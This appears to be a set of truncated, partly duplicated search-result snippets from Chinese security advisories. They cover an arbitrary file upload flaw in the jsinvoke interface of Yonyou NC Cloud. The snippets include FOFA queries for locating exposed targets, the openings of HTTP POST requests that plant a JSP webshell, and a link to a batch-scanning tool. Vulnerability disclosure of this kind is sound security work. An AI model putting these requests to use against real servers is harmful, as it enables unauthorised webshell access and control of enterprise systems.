用友NC Cloud jsinvoke 任意文件上传漏洞 漏洞描述用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限 app="用友-NC-Cloud" 写入webshell POST /uapjs/jsinvoke/?action=invoke Content-Type: application/json { "serviceName": "nc.itf.iufo.IBaseSP...
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器 影响范围 NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Cloud2111、YonBIP高级版2207 漏洞复现 fofa语法:app="用友...
FOFA: app="用友-NC-Cloud" 漏洞复现 测试目标:http://127.0.01:8090 POC1:发送POST请求上传名为404.jsp的webshell,经测试返回404或200均为上传成功 POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: 10.211.55.5:8090 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Age...
21 changes: 21 additions & 0 deletions 21 用友NC Cloud jsinvoke 任意文件上传漏洞.md Original file line numberDiff line numberDiff line change @@ -3,6 +3,7 @@ 用友NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限 app="用友-NC-Cloud" ## ...
漏洞复现 >任意文件上传 利用Burp抓包修改文件后缀名导,致任意文件上传 >远程代码执行 利用Burp抓包修改数据包信息,进行代码执行 POC and 检测脚本 >任意文件上传POC POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: xx.xx.xx.xx:xx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/...
6 7 8 9 0 1 2 3 4 5 6 7 8 9 可以收录到专辑噢~ 五:批量检测 项目地址: https://github.com/MzzdToT/Yongyou_NC_Cloud_upload_rce 六:修复建议 联系厂家发布更新补丁 # 渗透测试# 黑客# 网络安全# 网络安全技术 本文为芝士土拨鼠独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:fre...
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。 影响范围 NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Cloud2111、YonBIP高级版2207 ...
用友NC Cloud jsinvoke 任意文件上传漏洞 漏洞描述用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限 app="用友-NC-Cloud" 写入webshell POST /uapjs/jsinvoke/?action=invoke Content-Type: application/json { "serviceName": "nc.itf.iufo.IBaseSP...
用友NC Cloud jsinvoke 任意文件上传漏洞 漏洞描述用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限 app="用友-NC-Cloud" 写入webshell POST /uapjs/jsinvoke/?action=invoke Content-Type: application/json { "serviceName": "nc.itf.iufo.IBaseSP...
app="用友-NC-Cloud" 5.漏洞复现 漏洞链接:http://127.0.0.1/823780482.jsp?error=bsh.Interpreter 漏洞数据包,如下,该数据包上传823780482.jsp的webshell POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) ...